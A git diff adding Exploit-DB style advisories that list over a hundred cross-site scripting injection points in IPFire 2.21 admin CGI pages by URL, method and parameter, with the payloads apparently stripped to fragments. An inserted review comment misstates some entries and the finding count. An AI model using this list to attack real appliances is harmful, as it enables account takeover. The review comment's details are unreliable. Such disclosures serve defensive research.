+ +METHOD +Post + +PARAMETER +SPEAKER_ON + +PAYLOAD +'> + +################################################################################# + +XSS104 | Stored + +URL +http://192.168.2.200:81/cgi-bin/modem.cgi? + +METHOD +Post + +PARAMETER +SPEAKER_OFF + +PAYLOAD +'> + +################################################################################# + +XSS105 | Stored + +URL +http://192.168.2.200:81/cgi-bin/modem.cgi? + +METHOD +Post + +PARAMETER +TONE_DIAL + +PAYLOAD +'> + +################################################################################# + +XSS106 | Stored + +URL +http://192.168.2.200:81/cgi-bin/modem.cgi? + +METHOD +Post + +PARAMETER +PULSE_DIAL + +PAYLOAD +'> + +################################################################################# + +XSS107 | Reflected + +URL +http://192.168.2.200:81/cgi-bin/modem.cgi? + +METHOD +Post + +PARAMETER +TIMEOUT + +PAYLOAD +'> + +################################################################################# + +XSS108 | Stored + +URL +http://192.168.2.200:81/cgi-bin/preferences.cgi? + +METHOD +Post + +PARAMETER +HOSTNAME + +PAYLOAD +'> + +################################################################################# + +XSS109 | Stored + +URL +http://192.168.2.200:81/cgi-bin/preferences.cgi? + +METHOD +Post + +PARAMETER +KEYMAP + +PAYLOAD +'> + +################################################################################# + +XSS110 | Stored + +URL +http://192.168.2.200:81/cgi-bin/preferences.cgi? + +METHOD +Post + +PARAMETER +OPENNESS + +PAYLOAD +'> + +################################################################################# \ No newline at end of file diff --git a/exploits/cgi/webapps/46344.txt b/exploits/cgi/webapps/46344.txt new file mode 100644 index 000000000..a38d11742 --- /dev/null +++ b/exploits/cgi/webapps/46344.txt 
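Review bot: Every PAYLOAD field in this advisory is reduced to `'>` or `'">` (XSS94's is empty and XSS95's is `">`), which looks like the injected markup was stripped somewhere between the author and the database, so none of the 110 findings can be reproduced from the stored text as it stands; the payload lines should be restored, or the tags escaped, before this entry is relied on. All entries are POSTs to `/cgi-bin/*.cgi` on port 81, which appear to be the appliance's administrative pages, yet the advisory never states whether an authenticated admin session is required; a one-line note on that would let a reader gauge the actual impact of the reflected cases.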
@@ -0,0 +1,2649 @@
+##################################################################################################################################
+# Exploit Title: IPFire 2.21 - Core Update 127 | Cross-Site Scripting
+# Date: 08.02.2019
+# Exploit Author: Ozer Goker
+# Vendor Homepage: https://www.ipfire.org
+# Software Link:
+https://downloads.ipfire.org/releases/ipfire-2.x/2.21-core127/ipfire-2.21.x86_64-full-core127.iso
+# Version: IPFire 2.21 - Core Update 127
+##################################################################################################################################
+
+Introduction
+IPFire is a Linux distribution that focusses on easy setup, good handling
+and high level of security. It is operated via an intuitive web-based
+interface which offers many configuration options for beginning and
+experienced system administrators. IPFire is maintained by developers who
+are concerned about security and who update the product regularly to keep
+it secure. IPFire ships with a custom package manager called Pakfire and
+the system can be expanded with various add-ons.
+
+
+#################################################################################
+
+XSS details: Reflected & Stored
+
+#################################################################################
+
+XSS1 | Reflected
+
+URL
+https://192.168.2.200:444/cgi-bin/mail.cgi
+
+METHOD
+Post
+
+PARAMETER
+txt_mailsender
+
+PAYLOAD
+'">
+
+#################################################################################
+
+XSS2 | Reflected
+
+URL
+https://192.168.2.200:444/cgi-bin/mail.cgi
+
+METHOD
+Post
+
+PARAMETER
+txt_recipient
+
+PAYLOAD
+'>
+
+#################################################################################
+
+XSS3 | Reflected
+
+URL
+https://192.168.2.200:444/cgi-bin/mail.cgi
+
+METHOD
+Post
+
+PARAMETER
+txt_mailserver
+
+PAYLOAD
+'>
+
+#################################################################################
+
+XSS4 | Reflected
+
+URL
+https://192.168.2.200:444/cgi-bin/mail.cgi
+
+METHOD
+Post
+
+PARAMETER
+txt_mailport
+
+PAYLOAD
+'>
+
+#################################################################################
+
+XSS5 | Reflected
+
+URL
+https://192.168.2.200:444/cgi-bin/mail.cgi
+
+METHOD
+Post
+
+PARAMETER
+txt_mailuser
+
+PAYLOAD
+'>
+
+#################################################################################
+
+XSS6 | Reflected
+
+URL
+https://192.168.2.200:444/cgi-bin/mail.cgi
+
+METHOD
+Post
+
+PARAMETER
+txt_mailpass
+
+PAYLOAD
+'>
+
+#################################################################################
+
+XSS7 | Reflected
+
+URL
+https://192.168.2.200:444/cgi-bin/proxy.cgi
+
+METHOD
+Post
+
+PARAMETER
+PROXY_PORT
+
+PAYLOAD
+'>
+
+#################################################################################
+
+XSS8 | Reflected
+
+URL
+https://192.168.2.200:444/cgi-bin/proxy.cgi
+
+METHOD
+Post
+
+PARAMETER
+TRANSPARENT_PORT
+
+PAYLOAD
+'>
+
+#################################################################################
+
+XSS9 | Reflected
+
+URL
+https://192.168.2.200:444/cgi-bin/proxy.cgi
+
+METHOD
+Post
+
+PARAMETER
+UPSTREAM_PROXY
+
+PAYLOAD
+'>
+
+#################################################################################
+
+XSS10 | Reflected
+
+URL
+https://192.168.2.200:444/cgi-bin/proxy.cgi
+
+METHOD
+Post
+
+PARAMETER
+UPSTREAM_USER
+
+PAYLOAD
+'>
+
+#################################################################################
+
+XSS11 | Reflected
+
+URL
+https://192.168.2.200:444/cgi-bin/proxy.cgi
+
+METHOD
+Post
+
+PARAMETER
+UPSTREAM_PASSWORD
+
+PAYLOAD
+'>
+
+#################################################################################
+
+XSS12 | Reflected
+
+URL
+https://192.168.2.200:444/cgi-bin/proxy.cgi
+
+METHOD
+Post
+
+PARAMETER
+FILEDESCRIPTORS
+
+PAYLOAD
+'>
+
+#################################################################################
+
+XSS13 | Reflected
+
+URL
+https://192.168.2.200:444/cgi-bin/proxy.cgi
+
+METHOD
+Post
+
+PARAMETER
+CACHE_MEM
+
+PAYLOAD
+'>
+
+#################################################################################
+
+XSS14 | Reflected
+
+URL
+https://192.168.2.200:444/cgi-bin/proxy.cgi
+
+METHOD
+Post
+
+PARAMETER
+CACHE_SIZE
+
+PAYLOAD
+'>
+
+#################################################################################
+
+XSS15 | Reflected
+
+URL
+https://192.168.2.200:444/cgi-bin/proxy.cgi
+
+METHOD
+Post
+
+PARAMETER
+MIN_SIZE
+
+PAYLOAD
+'>
+
+#################################################################################
+
+XSS16 | Reflected
+
+URL
+https://192.168.2.200:444/cgi-bin/proxy.cgi
+
+METHOD
+Post
+
+PARAMETER
+MAX_SIZE
+
+PAYLOAD
+'>
+
+#################################################################################
+
+XSS17 | Reflected
+
+URL
+https://192.168.2.200:444/cgi-bin/proxy.cgi
+
+METHOD
+Post
+
+PARAMETER
+MAX_INCOMING_SIZE
+
+PAYLOAD
+'>
+
+#################################################################################
+
+XSS18 | Reflected
+
+URL
+https://192.168.2.200:444/cgi-bin/proxy.cgi
+
+METHOD
+Post
+
+PARAMETER
+MAX_OUTGOING_SIZE
+
+PAYLOAD
+'>
+
+#################################################################################
+
+XSS19 | Stored
+
+URL
+https://192.168.2.200:444/cgi-bin/proxy.cgi
+
+METHOD
+Post
+
+PARAMETER
+AUTH_CHILDREN
+
+PAYLOAD
+'>
+
+#################################################################################
+
+XSS20 | Reflected
+
+URL
+https://192.168.2.200:444/cgi-bin/proxy.cgi
+
+METHOD
+Post
+
+PARAMETER
+AUTH_CACHE_TTL
+
+PAYLOAD
+'>
+
+#################################################################################
+
+XSS21 | Stored
+
+URL
+https://192.168.2.200:444/cgi-bin/proxy.cgi
+
+METHOD
+Post
+
+PARAMETER
+AUTH_ALWAYS_REQUIRED
+
+PAYLOAD
+'>
+
+#################################################################################
+
+XSS22 | Stored
+
+URL
+https://192.168.2.200:444/cgi-bin/proxy.cgi
+
+METHOD
+Post
+
+PARAMETER
+DST_NOAUTH
+
+PAYLOAD
+'>
+
+#################################################################################
+
+XSS23 | Stored
+
+URL
+https://192.168.2.200:444/cgi-bin/proxy.cgi
+
+METHOD
+Post
+
+PARAMETER
+NCSA_MIN_PASS_LEN
+
+PAYLOAD
+'>
+
+#################################################################################
+
+XSS24 | Reflected
+
+URL
+https://192.168.2.200:444/cgi-bin/proxy.cgi
+
+METHOD
+Post
+
+PARAMETER
+NCSA_BYPASS_REDIR
+
+PAYLOAD
+'>
+
+#################################################################################
+
+XSS25 | Stored
+
+URL
+https://192.168.2.200:444/cgi-bin/proxy.cgi
+
+METHOD
+Post
+
+PARAMETER
+IDENT_REQUIRED
+
+PAYLOAD
+'>
+
+#################################################################################
+
+XSS26 | Reflected
+
+URL
+https://192.168.2.200:444/cgi-bin/proxy.cgi
+
+METHOD
+Post
+
+PARAMETER
+IDENT_TIMEOUT
+
+PAYLOAD
+'>
+
+#################################################################################
+
+XSS27 | Reflected
+
+URL
+https://192.168.2.200:444/cgi-bin/proxy.cgi
+
+METHOD
+Post
+
+PARAMETER
+IDENT_HOSTS
+
+PAYLOAD
+'>
+
+#################################################################################
+
+XSS28 | Stored
+
+URL
+https://192.168.2.200:444/cgi-bin/proxy.cgi
+
+METHOD
+Post
+
+PARAMETER
+IDENT_ENABLE_ACL
+
+PAYLOAD
+'>
+
+#################################################################################
+
+XSS29 | Stored
+
+URL
+https://192.168.2.200:444/cgi-bin/proxy.cgi
+
+METHOD
+Post
+
+PARAMETER
+IDENT_USER_ACL
+
+PAYLOAD
+'>
+
+#################################################################################
+
+XSS30 | Stored
+
+URL
+https://192.168.2.200:444/cgi-bin/proxy.cgi
+
+METHOD
+Post
+
+PARAMETER
+IDENT_ALLOW_USERS
+
+PAYLOAD
+'>
+
+#################################################################################
+
+XSS31 | Reflected
+
+URL
+https://192.168.2.200:444/cgi-bin/proxy.cgi
+
+METHOD
+Post
+
+PARAMETER
+IDENT_DENY_USERS
+
+PAYLOAD
+'>
+
+#################################################################################
+
+XSS32 | Stored
+
+URL
+https://192.168.2.200:444/cgi-bin/proxy.cgi
+
+METHOD
+Post
+
+PARAMETER
+LDAP_TYPE
+
+PAYLOAD
+'>
+
+#################################################################################
+
+XSS33 | Reflected
+
+URL
+https://192.168.2.200:444/cgi-bin/proxy.cgi
+
+METHOD
+Post
+
+PARAMETER
+LDAP_PORT
+
+PAYLOAD
+'>
+
+#################################################################################
+
+XSS34 | Stored
+
+URL
+https://192.168.2.200:444/cgi-bin/proxy.cgi
+
+METHOD
+Post
+
+PARAMETER
+RADIUS_PORT
+
+PAYLOAD
+'>
+
+#################################################################################
+
+XSS35 | Stored
+
+URL
+https://192.168.2.200:444/cgi-bin/proxy.cgi
+
+METHOD
+Post
+
+PARAMETER
+RADIUS_ENABLE_ACL
+
+PAYLOAD
+'>
+
+#################################################################################
+
+XSS36 | Stored
+
+URL
+https://192.168.2.200:444/cgi-bin/proxy.cgi
+
+METHOD
+Post
+
+PARAMETER
+RADIUS_USER_ACL
+
+PAYLOAD
+'>
+
+#################################################################################
+
+XSS37 | Stored
+
+URL
+https://192.168.2.200:444/cgi-bin/proxy.cgi
+
+METHOD
+Post
+
+PARAMETER
+RADIUS_ALLOW_USERS
+
+PAYLOAD
+'>
+
+#################################################################################
+
+XSS38 | Stored
+
+URL
+https://192.168.2.200:444/cgi-bin/proxy.cgi
+
+METHOD
+Post
+
+PARAMETER
+RADIUS_DENY_USERS
+
+PAYLOAD
+'>
+
+#################################################################################
+
+XSS39 | Stored
+
+URL
+https://192.168.2.200:444/cgi-bin/urlfilter.cgi
+
+METHOD
+Post
+
+PARAMETER
+REDIRECT_PAGE
+
+PAYLOAD
+'>
+
+#################################################################################
+
+XSS40 | Reflected
+
+URL
+https://192.168.2.200:444/cgi-bin/urlfilter.cgi
+
+METHOD
+Post
+
+PARAMETER
+BE_BLACKLIST
+
+PAYLOAD
+'>
+
+#################################################################################
+
+XSS41 | Reflected
+
+URL
+https://192.168.2.200:444/cgi-bin/updatexlrator.cgi
+
+METHOD
+Post
+
+PARAMETER
+MAX_DISK_USAGE
+
+PAYLOAD
+'>
+
+#################################################################################
+
+XSS42 | Reflected
+
+URL
+https://192.168.2.200:444/cgi-bin/updatexlrator.cgi
+
+METHOD
+Post
+
+PARAMETER
+MAX_DOWNLOAD_RATE
+
+PAYLOAD
+'>
+
+#################################################################################
+
+XSS43 | Reflected
+
+URL
+https://192.168.2.200:444/cgi-bin/dhcp.cgi
+
+METHOD
+Post
+
+PARAMETER
+START_ADDR_GREEN
+
+PAYLOAD
+'>
+
+#################################################################################
+
+XSS44 | Reflected
+
+URL
+https://192.168.2.200:444/cgi-bin/dhcp.cgi
+
+METHOD
+Post
+
+PARAMETER
+END_ADDR_GREEN
+
+PAYLOAD
+'>
+
+#################################################################################
+
+XSS45 | Reflected
+
+URL
+https://192.168.2.200:444/cgi-bin/dhcp.cgi
+
+METHOD
+Post
+
+PARAMETER
+DEFAULT_LEASE_TIME_GREEN
+
+PAYLOAD
+'>
+
+#################################################################################
+
+XSS46 | Reflected
+
+URL
+https://192.168.2.200:444/cgi-bin/dhcp.cgi
+
+METHOD
+Post
+
+PARAMETER
+MAX_LEASE_TIME_GREEN
+
+PAYLOAD
+'>
+
+#################################################################################
+
+XSS47 | Reflected
+
+URL
+https://192.168.2.200:444/cgi-bin/dhcp.cgi
+
+METHOD
+Post
+
+PARAMETER
+DOMAIN_NAME_GREEN
+
+PAYLOAD
+'>
+
+#################################################################################
+
+XSS48 | Reflected
+
+URL
+https://192.168.2.200:444/cgi-bin/dhcp.cgi
+
+METHOD
+Post
+
+PARAMETER
+DNS1_GREEN
+
+PAYLOAD
+'>
+
+#################################################################################
+
+XSS49 | Reflected
+
+URL
+https://192.168.2.200:444/cgi-bin/dhcp.cgi
+
+METHOD
+Post
+
+PARAMETER
+DNS2_GREEN
+
+PAYLOAD
+'>
+
+#################################################################################
+
+XSS50 | Reflected
+
+URL
+https://192.168.2.200:444/cgi-bin/dhcp.cgi
+
+METHOD
+Post
+
+PARAMETER
+NTP1_GREEN
+
+PAYLOAD
+'>
+
+#################################################################################
+
+XSS51 | Reflected
+
+URL
+https://192.168.2.200:444/cgi-bin/dhcp.cgi
+
+METHOD
+Post
+
+PARAMETER
+NTP2_GREEN
+
+PAYLOAD
+'>
+
+#################################################################################
+
+XSS52 | Reflected
+
+URL
+https://192.168.2.200:444/cgi-bin/dhcp.cgi
+
+METHOD
+Post
+
+PARAMETER
+WINS1_GREEN
+
+PAYLOAD
+'>
+
+#################################################################################
+
+XSS53 | Reflected
+
+URL
+https://192.168.2.200:444/cgi-bin/dhcp.cgi
+
+METHOD
+Post
+
+PARAMETER
+WINS2_GREEN
+
+PAYLOAD
+'>
+
+#################################################################################
+
+XSS54 | Reflected
+
+URL
+https://192.168.2.200:444/cgi-bin/dhcp.cgi
+
+METHOD
+Post
+
+PARAMETER
+NEXT_GREEN
+
+PAYLOAD
+'>
+
+#################################################################################
+
+XSS55 | Reflected
+
+URL
+https://192.168.2.200:444/cgi-bin/dhcp.cgi
+
+METHOD
+Post
+
+PARAMETER
+FILE_GREEN
+
+PAYLOAD
+'>
+
+#################################################################################
+
+XSS56 | Reflected
+
+URL
+https://192.168.2.200:444/cgi-bin/dhcp.cgi
+
+METHOD
+Post
+
+PARAMETER
+ADVOPT_DATA
+
+PAYLOAD
+'>
+
+#################################################################################
+
+XSS57 | Reflected
+
+URL
+https://192.168.2.200:444/cgi-bin/dhcp.cgi
+
+METHOD
+Post
+
+PARAMETER
+KEY1
+
+PAYLOAD
+'>
+
+#################################################################################
+
+XSS58 | Reflected
+
+URL
+https://192.168.2.200:444/cgi-bin/dhcp.cgi
+
+METHOD
+Post
+
+PARAMETER
+FIX_MAC
+
+PAYLOAD
+'>
+
+#################################################################################
+
+XSS59 | Reflected
+
+URL
+https://192.168.2.200:444/cgi-bin/dhcp.cgi
+
+METHOD
+Post
+
+PARAMETER
+FIX_ADDR
+
+PAYLOAD
+'>
+
+#################################################################################
+
+XSS60 | Reflected
+
+URL
+https://192.168.2.200:444/cgi-bin/dhcp.cgi
+
+METHOD
+Post
+
+PARAMETER
+FIX_REMARK
+
+PAYLOAD
+'>
+
+#################################################################################
+
+XSS61 | Reflected
+
+URL
+https://192.168.2.200:444/cgi-bin/dhcp.cgi
+
+METHOD
+Post
+
+PARAMETER
+FIX_NEXTADDR
+
+PAYLOAD
+'>
+
+#################################################################################
+
+XSS62 | Reflected
+
+URL
+https://192.168.2.200:444/cgi-bin/dhcp.cgi
+
+METHOD
+Post
+
+PARAMETER
+FIX_FILENAME
+
+PAYLOAD
+'>
+
+#################################################################################
+
+XSS63 | Reflected
+
+URL
+https://192.168.2.200:444/cgi-bin/dhcp.cgi
+
+METHOD
+Post
+
+PARAMETER
+FIX_ROOTPATH
+
+PAYLOAD
+'>
+
+#################################################################################
+
+XSS64 | Reflected
+
+URL
+https://192.168.2.200:444/cgi-bin/dhcp.cgi
+
+METHOD
+Post
+
+PARAMETER
+KEY2
+
+PAYLOAD
+'>
+
+#################################################################################
+
+XSS65 | Reflected
+
+URL
+https://192.168.2.200:444/cgi-bin/captive.cgi
+
+METHOD
+Post
+
+PARAMETER
+TITLE
+
+PAYLOAD
+">
+
+#################################################################################
+
+XSS66 | Reflected
+
+URL
+https://192.168.2.200:444/cgi-bin/captive.cgi
+
+METHOD
+Post
+
+PARAMETER
+COLOR
+
+PAYLOAD
+">
+
+#################################################################################
+
+XSS67 | Stored
+
+URL
+https://192.168.2.200:444/cgi-bin/connscheduler.cgi
+
+METHOD
+Post
+
+PARAMETER
+ACTION_HOUR
+
+PAYLOAD
+
+
+#################################################################################
+
+XSS68 | Stored
+
+URL
+https://192.168.2.200:444/cgi-bin/connscheduler.cgi
+
+METHOD
+Post
+
+PARAMETER
+ACTION_MINUTE
+
+PAYLOAD
+
+
+#################################################################################
+
+XSS69 | Stored
+
+URL
+https://192.168.2.200:444/cgi-bin/connscheduler.cgi
+
+METHOD
+Post
+
+PARAMETER
+ACTION_DAYSTART
+
+PAYLOAD
+
+
+#################################################################################
+
+XSS70 | Stored
+
+URL
+https://192.168.2.200:444/cgi-bin/connscheduler.cgi
+
+METHOD
+Post
+
+PARAMETER
+ACTION_DAYEND
+
+PAYLOAD
+
+
+#################################################################################
+
+XSS71 | Reflected
+
+URL
+https://192.168.2.200:444/cgi-bin/hosts.cgi
+
+METHOD
+Post
+
+PARAMETER
+KEY1
+
+PAYLOAD
+'>
+
+#################################################################################
+
+XSS72 | Reflected
+
+URL
+https://192.168.2.200:444/cgi-bin/hosts.cgi
+
+METHOD
+Post
+
+PARAMETER
+IP
+
+PAYLOAD
+'>
+
+#################################################################################
+
+XSS73 | Reflected
+
+URL
+https://192.168.2.200:444/cgi-bin/hosts.cgi
+
+METHOD
+Post
+
+PARAMETER
+HOST
+
+PAYLOAD
+'>
+
+#################################################################################
+
+XSS74 | Reflected
+
+URL
+https://192.168.2.200:444/cgi-bin/hosts.cgi
+
+METHOD
+Post
+
+PARAMETER
+DOM
+
+PAYLOAD
+'>
+
+#################################################################################
+
+XSS75 | Reflected
+
+URL
+https://192.168.2.200:444/cgi-bin/dns.cgi
+
+METHOD
+Post
+
+PARAMETER
+DNS0
+
+PAYLOAD
+">
+
+#################################################################################
+
+XSS76 | Reflected
+
+URL
+https://192.168.2.200:444/cgi-bin/dns.cgi
+
+METHOD
+Post
+
+PARAMETER
+DNS1
+
+PAYLOAD
+">
+
+#################################################################################
+
+XSS77 | Reflected
+
+URL
+https://192.168.2.200:444/cgi-bin/dnsforward.cgi
+
+METHOD
+Post
+
+PARAMETER
+ZONE
+
+PAYLOAD
+">
+
+#################################################################################
+
+XSS78 | Reflected
+
+URL
+https://192.168.2.200:444/cgi-bin/dnsforward.cgi
+
+METHOD
+Post
+
+PARAMETER
+FORWARD_SERVERS
+
+PAYLOAD
+'>
+
+#################################################################################
+
+XSS79 | Reflected
+
+URL
+https://192.168.2.200:444/cgi-bin/routing.cgi
+
+METHOD
+Post
+
+PARAMETER
+KEY1
+
+PAYLOAD
+'>
+
+#################################################################################
+
+XSS80 | Reflected
+
+URL
+https://192.168.2.200:444/cgi-bin/routing.cgi
+
+METHOD
+Post
+
+PARAMETER
+GATEWAY
+
+PAYLOAD
+'>
+
+#################################################################################
+
+XSS81 | Reflected
+
+URL
+https://192.168.2.200:444/cgi-bin/routing.cgi
+
+METHOD
+Post
+
+PARAMETER
+REMARK
+
+PAYLOAD
+'>
+
+#################################################################################
+
+XSS82 | Reflected
+
+URL
+https://192.168.2.200:444/cgi-bin/mac.cgi
+
+METHOD
+Post
+
+PARAMETER
+MAC
+
+PAYLOAD
+'>
+
+#################################################################################
+
+XSS83 | Reflected
+
+URL
+https://192.168.2.200:444/cgi-bin/mac.cgi
+
+METHOD
+Post
+
+PARAMETER
+MAC1
+
+PAYLOAD
+'>
+
+#################################################################################
+
+XSS84 | Reflected
+
+URL
+https://192.168.2.200:444/cgi-bin/mac.cgi
+
+METHOD
+Post
+
+PARAMETER
+MAC2
+
+PAYLOAD
+'>
+
+#################################################################################
+
+XSS85 | Reflected
+
+URL
+https://192.168.2.200:444/cgi-bin/wakeonlan.cgi
+
+METHOD
+Post
+
+PARAMETER
+CLIENT_MAC
+
+PAYLOAD
+'>
+
+#################################################################################
+
+XSS86 | Reflected
+
+URL
+https://192.168.2.200:444/cgi-bin/wakeonlan.cgi
+
+METHOD
+Post
+
+PARAMETER
+CLIENT_COMMENT
+
+PAYLOAD
+'>
+
+#################################################################################
+
+XSS87 | Reflected
+
+URL
+https://192.168.2.200:444/cgi-bin/vpnmain.cgi
+
+METHOD
+Post
+
+PARAMETER
+TYPE
+
+PAYLOAD
+'>
+
+#################################################################################
+
+XSS88 | Reflected
+
+URL
+https://192.168.2.200:444/cgi-bin/vpnmain.cgi
+
+METHOD
+Post
+
+PARAMETER
+IKE_VERSION
+
+PAYLOAD
+'>
+
+#################################################################################
+
+XSS89 | Reflected
+
+URL
+https://192.168.2.200:444/cgi-bin/vpnmain.cgi
+
+METHOD
+Post
+
+PARAMETER
+IKE_ENCRYPTION
+
+PAYLOAD
+'>
+
+#################################################################################
+
+XSS90 | Reflected
+
+URL
+https://192.168.2.200:444/cgi-bin/vpnmain.cgi
+
+METHOD
+Post
+
+PARAMETER
+IKE_INTEGRITY
+
+PAYLOAD
+'>
+
+#################################################################################
+
+XSS91 | Reflected
+
+URL
+https://192.168.2.200:444/cgi-bin/vpnmain.cgi
+
+METHOD
+Post
+
+PARAMETER
+IKE_GROUPTYPE
+
+PAYLOAD
+'>
+
+#################################################################################
+
+XSS92 | Reflected
+
+URL
+https://192.168.2.200:444/cgi-bin/vpnmain.cgi
+
+METHOD
+Post
+
+PARAMETER
+IKE_LIFETIME
+
+PAYLOAD
+'>
+
+#################################################################################
+
+XSS93 | Reflected
+
+URL
+https://192.168.2.200:444/cgi-bin/vpnmain.cgi
+
+METHOD
+Post
+
+PARAMETER
+ESP_ENCRYPTION
+
+PAYLOAD
+'>
+
+#################################################################################
+
+XSS94 | Reflected
+
+URL
+https://192.168.2.200:444/cgi-bin/vpnmain.cgi
+
+METHOD
+Post
+
+PARAMETER
+ESP_INTEGRITY
+
+PAYLOAD
+'>
+
+#################################################################################
+
+XSS95 | Reflected
+
+URL
+https://192.168.2.200:444/cgi-bin/vpnmain.cgi
+
+METHOD
+Post
+
+PARAMETER
+ESP_GROUPTYPE
+
+PAYLOAD
+'">
+
+#################################################################################
+
+XSS96 | Reflected
+
+URL
+https://192.168.2.200:444/cgi-bin/vpnmain.cgi
+
+METHOD
+Post
+
+PARAMETER
+ESP_KEYLIFE
+
+PAYLOAD
+'>
+
+#################################################################################
+
+XSS97 | Reflected
+
+URL
+https://192.168.2.200:444/cgi-bin/vpnmain.cgi
+
+METHOD
+Post
+
+PARAMETER
+COMPRESSION
+
+PAYLOAD
+'>
+
+#################################################################################
+
+XSS98 | Reflected
+
+URL
+https://192.168.2.200:444/cgi-bin/vpnmain.cgi
+
+METHOD
+Post
+
+PARAMETER
+ONLY_PROPOSED
+
+PAYLOAD
+'>
+
+#################################################################################
+
+XSS99 | Reflected
+
+URL
+https://192.168.2.200:444/cgi-bin/vpnmain.cgi
+
+METHOD
+Post
+
+PARAMETER
+PFS
+
+PAYLOAD
+'>
+
+#################################################################################
+
+XSS100 | Reflected
+
+URL
+https://192.168.2.200:444/cgi-bin/vpnmain.cgi
+
+METHOD
+Post
+
+PARAMETER
+DPD_ACTION
+
+PAYLOAD
+'>
+
+#################################################################################
+
+XSS101 | Reflected
+
+URL
+https://192.168.2.200:444/cgi-bin/vpnmain.cgi
+
+METHOD
+Post
+
+PARAMETER
+DPD_DELAY
+
+PAYLOAD
+'>
+
+#################################################################################
+
+XSS102 | Reflected
+
+URL
+https://192.168.2.200:444/cgi-bin/vpnmain.cgi
+
+METHOD
+Post
+
+PARAMETER
+DPD_TIMEOUT
+
+PAYLOAD
+'>
+
+#################################################################################
+
+XSS103 | Reflected
+
+URL
+https://192.168.2.200:444/cgi-bin/vpnmain.cgi
+
+METHOD
+Post
+
+PARAMETER
+FORCE_MOBIKE
+
+PAYLOAD
+'>
+
+#################################################################################
+
+XSS104 | Reflected
+
+URL
+https://192.168.2.200:444/cgi-bin/vpnmain.cgi
+
+METHOD
+Post
+
+PARAMETER
+NAME
+
+PAYLOAD
+'>
+
+#################################################################################
+
+XSS105 | Reflected
+
+URL
+https://192.168.2.200:444/cgi-bin/vpnmain.cgi
+
+METHOD
+Post
+
+PARAMETER
+LOCAL_SUBNET
+
+PAYLOAD
+'>
+
+#################################################################################
+
+XSS106 | Reflected
+
+URL
+https://192.168.2.200:444/cgi-bin/vpnmain.cgi
+
+METHOD
+Post
+
+PARAMETER
+REMOTE
+
+PAYLOAD
+'>
+
+#################################################################################
+
+XSS107 | Reflected
+
+URL
+https://192.168.2.200:444/cgi-bin/vpnmain.cgi
+
+METHOD
+Post
+
+PARAMETER
+LOCAL_ID
+
+PAYLOAD
+'>
+
+#################################################################################
+
+XSS108 | Reflected
+
+URL
+https://192.168.2.200:444/cgi-bin/vpnmain.cgi
+
+METHOD
+Post
+
+PARAMETER
+REMOTE_ID
+
+PAYLOAD
+'>
+
+#################################################################################
+
+XSS109 | Reflected
+
+URL
+https://192.168.2.200:444/cgi-bin/vpnmain.cgi
+
+METHOD
+Post
+
+PARAMETER
+PSK
+
+PAYLOAD
+'>
+
+#################################################################################
+
+XSS110 | Reflected
+
+URL
+https://192.168.2.200:444/cgi-bin/vpnmain.cgi
+
+METHOD
+Post
+
+PARAMETER
+ROOTCERT_ORGANIZATION
+
+PAYLOAD
+'>
+
+#################################################################################
+
+XSS111 | Reflected
+
+URL
+https://192.168.2.200:444/cgi-bin/vpnmain.cgi
+
+METHOD
+Post
+
+PARAMETER
+ROOTCERT_HOSTNAME
+
+PAYLOAD
+'>
+
+#################################################################################
+
+XSS112 | Reflected
+
+URL
+https://192.168.2.200:444/cgi-bin/vpnmain.cgi
+
+METHOD
+Post
+
+PARAMETER
+ROOTCERT_EMAIL
+
+PAYLOAD
+'>
+
+#################################################################################
+
+XSS113 | Reflected
+
+URL
+https://192.168.2.200:444/cgi-bin/vpnmain.cgi
+
+METHOD
+Post
+
+PARAMETER
+ROOTCERT_OU
+
+PAYLOAD
+'>
+
+#################################################################################
+
+XSS114 | Reflected
+
+URL
+https://192.168.2.200:444/cgi-bin/vpnmain.cgi
+
+METHOD
+Post
+
+PARAMETER
+ROOTCERT_CITY
+
+PAYLOAD
+'>
+
+#################################################################################
+
+XSS115 | Reflected
+
+URL
+https://192.168.2.200:444/cgi-bin/vpnmain.cgi
+
+METHOD
+Post
+
+PARAMETER
+ROOTCERT_STATE
+
+PAYLOAD
+'>
+
+#################################################################################
+
+XSS116 | Reflected
+
+URL
+https://192.168.2.200:444/cgi-bin/vpnmain.cgi
+
+METHOD
+Post
+
+PARAMETER
+SUBJECTALTNAME
+
+PAYLOAD
+'>
+
+#################################################################################
+
+XSS117 | Reflected
+
+URL
+https://192.168.2.200:444/cgi-bin/vpnmain.cgi
+
+METHOD
+Post
+
+PARAMETER
+P12_PASS
+
+PAYLOAD
+'>
+
+#################################################################################
+
+XSS118 | Stored
+
+URL
+https://192.168.2.200:444/cgi-bin/ovpnmain.cgi
+
+METHOD
+Post
+
+PARAMETER
+VPN_IP
+
+PAYLOAD
+'>
+
+#################################################################################
+
+XSS119 | Stored
+
+URL
+https://192.168.2.200:444/cgi-bin/ovpnmain.cgi
+
+METHOD
+Post
+
+PARAMETER
+DMTU
+
+PAYLOAD
+'>
+
+#################################################################################
+
+XSS120 | Reflected
+
+URL
+https://192.168.2.200:444/cgi-bin/ovpnmain.cgi
+
+METHOD
+Post
+
+PARAMETER
+ccdname
+
+PAYLOAD
+'>
+
+#################################################################################
+
+XSS121 | Reflected
+
+URL
+https://192.168.2.200:444/cgi-bin/ovpnmain.cgi
+
+METHOD
+Post
+
+PARAMETER
+ccdsubnet
+
+PAYLOAD
+'>
+
+#################################################################################
+
+XSS122 | Reflected
+
+URL
+https://192.168.2.200:444/cgi-bin/ovpnmain.cgi
+
+METHOD
+Post
+
+PARAMETER
+DOVPN_SUBNET
+
+PAYLOAD
+'>
+
+#################################################################################
+
+XSS123 | Reflected
+
+URL
+https://192.168.2.200:444/cgi-bin/ovpnmain.cgi
+
+METHOD
+Post
+
+PARAMETER
+DHCP_DOMAIN
+
+PAYLOAD
+'>
+
+#################################################################################
+
+XSS124 | Reflected
+
+URL
+https://192.168.2.200:444/cgi-bin/ovpnmain.cgi
+
+METHOD
+Post
+
+PARAMETER
+DHCP_DNS
+
+PAYLOAD
+'>
+
+#################################################################################
+
+XSS125 | Reflected
+
+URL
+https://192.168.2.200:444/cgi-bin/ovpnmain.cgi
+
+METHOD
+Post
+
+PARAMETER
+DHCP_WINS
+
+PAYLOAD
+'>
+
+#################################################################################
+
+XSS126 | Reflected
+
+URL
+https://192.168.2.200:444/cgi-bin/ovpnmain.cgi
+
+METHOD
+Post
+
+PARAMETER
+ROUTES_PUSH
+
+PAYLOAD
+'>
+
+#################################################################################
+
+XSS127 | Reflected
+
+URL
+https://192.168.2.200:444/cgi-bin/ovpnmain.cgi
+
+METHOD
+Post
+
+PARAMETER
+FRAGMENT
+
+PAYLOAD
+'>
+
+#################################################################################
+
